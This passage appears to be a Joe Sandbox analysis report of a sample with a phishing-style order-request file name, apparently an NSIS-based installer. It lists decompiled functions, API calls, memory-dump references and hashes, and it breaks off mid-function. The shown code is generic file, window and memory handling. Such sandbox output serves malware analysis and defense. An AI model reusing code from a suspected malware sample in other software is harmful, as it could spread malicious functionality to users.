ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403232,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405C9E

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction ID: 79895e6dacc008681341a1447f190e2469ffe8152373b8c922f561a90a2bf5e3
Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction Fuzzy Hash: FCE08C3220921AABEF11AF908C00EEB3B6CFF04360F004832F910E7240D230E8218BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405CB9 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CB9(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405cbd
0x00405ccd
0x00405cd5
0x00000000
0x00405cdc
0x00000000
0x00405cde

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031E8,00000000,0078B6F8,000000FF,0078B6F8,000000FF,000000FF,00000004,00000000), ref: 00405CCD

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: 3bcd5730ec7463d7366e74611f21d1d4cfbccb505e455464be6c792c77663440
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: ABE0EC3225465AABEF109E559C00EEB7B6CFB057A0F044837F915E3150D631E921EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}

0x100027d0
0x100027d5
0x100027e5
0x100027ed
0x100027f4
0x100027f9
0x100027fe
0x10002803
0x10002808
0x1000280d
0x10002812
0x10002812
0x1000281a

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5

Memory Dump Source

Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040159B() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402BBF(0xfffffff0),  *(_t11 - 0x28)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015a6
0x004015ac
0x004015ae
0x0040281e
0x0040281e
0x00402a4f
0x00402a5b

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 627040d589bdeab8fa2eb58a529c745ef8675100561ec111daf7d71d3d3e8b9e
Instruction ID: 919d528a87020fadcf7da11d7c25636ac447c6c10cfa6ed71665d8ccb2c3e407
Opcode Fuzzy Hash: 627040d589bdeab8fa2eb58a529c745ef8675100561ec111daf7d71d3d3e8b9e
Instruction Fuzzy Hash: 4DD05E73B04100DBCB50DFE8AE08A9D77B5AB80338B24C177E601F25E4DAB8C6509B1E

Uniqueness

Uniqueness Score: -1.00%

Function 00404142 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404142(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x7a7a18; // 0x1043c
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x00404142
0x00404149
0x00404154
0x00000000
0x00404154
0x0040415a

APIs

SendMessageW.USER32(0001043C,00000000,00000000,00000000), ref: 00404154

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 34b1e43e723837e4f12290cd16e63c230a0646a25d15ec9393d9ca5565e974df
Instruction ID: cc05bc227ed13b811f407cb85d7c2569ddbf91d4c39e4ff41bb473b50526893a
Opcode Fuzzy Hash: 34b1e43e723837e4f12290cd16e63c230a0646a25d15ec9393d9ca5565e974df
Instruction Fuzzy Hash: ABC09B71744700BBEA10DF649D49F1777547BA4751F14C8297351F51D0C674D450D71C

Uniqueness

Uniqueness Score: -1.00%

Function 0040412B Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040412B(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x7a8a48, 0x28, _a4, 1); // executed
				return _t2;
			}

0x00404139
0x0040413f

APIs

SendMessageW.USER32(00000028,?,00000001,00403F57), ref: 00404139

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bf354d20d261541e0cf475626e5b376324ad062b219537505d1f6290c4af95c4
Instruction ID: d373e4bc0d40e7382ef1e11b314aa0fa38d31fe2e2f9466a5520a1a67522e00c
Opcode Fuzzy Hash: bf354d20d261541e0cf475626e5b376324ad062b219537505d1f6290c4af95c4
Instruction Fuzzy Hash: AFB01235180A00BBDE514B00FE09F457E62F7AC701F00C429B340240F0CEB200B0DB09

Uniqueness

Uniqueness Score: -1.00%

Function 00403235 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403235(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403243
0x00403249

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,00403517,?), ref: 00403243

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D

Uniqueness

Uniqueness Score: -1.00%

Function 00404118 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404118(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x7a1f3c, _a4); // executed
				return _t2;
			}

0x00404122
0x00404128

APIs

KiUserCallbackDispatcher.NTDLL(?,00403EF0), ref: 00404122

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 0ec1fdd4797c0866aaad3ea28fe52db4664cae4b4a58853501ce3901ad29477a
Instruction ID: 444c84cbde4606a42b11029cb4d9c6b68aea771a74e0ff2f6fd8e0518f780766
Opcode Fuzzy Hash: 0ec1fdd4797c0866aaad3ea28fe52db4664cae4b4a58853501ce3901ad29477a
Instruction Fuzzy Hash: ACA0113A000000AFCF028B80EF08C0ABB22ABE0300B20C03AA280800308B320820FB08

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7() {
				long _t2;
				void* _t6;
				void* _t10;

				_t2 = E00402BA2(_t6);
				if(_t2 <= 1) {
					_t2 = 1;
				}
				Sleep(_t2); // executed
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t10 - 4));
				return 0;
			}

0x004014d8
0x004014e0
0x004014e4
0x004014e4
0x004014e6
0x00402a4f
0x00402a5b

APIs

Sleep.KERNELBASE(00000000), ref: 004014E6

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3b931aa352be5dff596e25002f88090417078d46ab4e072b71b10e02e080c4ef
Instruction ID: 9fddfdb3ce08ea3f3c8fe9d319431df7e4e0be4ecd303254129af624b9b4f796
Opcode Fuzzy Hash: 3b931aa352be5dff596e25002f88090417078d46ab4e072b71b10e02e080c4ef
Instruction Fuzzy Hash: CBD0C977B141009BD790EFB9AE8986A73A8EB913293248837D902E11A2D97CC811462D

Uniqueness

Uniqueness Score: -1.00%

Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000121B() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
				return _t3;
			}

0x10001225
0x1000122b

APIs

GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

Memory Dump Source

Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404B0D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00404B0D(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x7a8a68;
				_t282 = 0;
				_v24 =  *0x7a8a50 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x7a8a59 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404A5B(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x7a8a58) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x7a1f24;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x7a1f38;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x7a1f24 = _t282;
								 *0x7a1f38 = _t282;
								 *0x7a8aa0 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x7a8a59 & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404ADB();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x7a1f38;
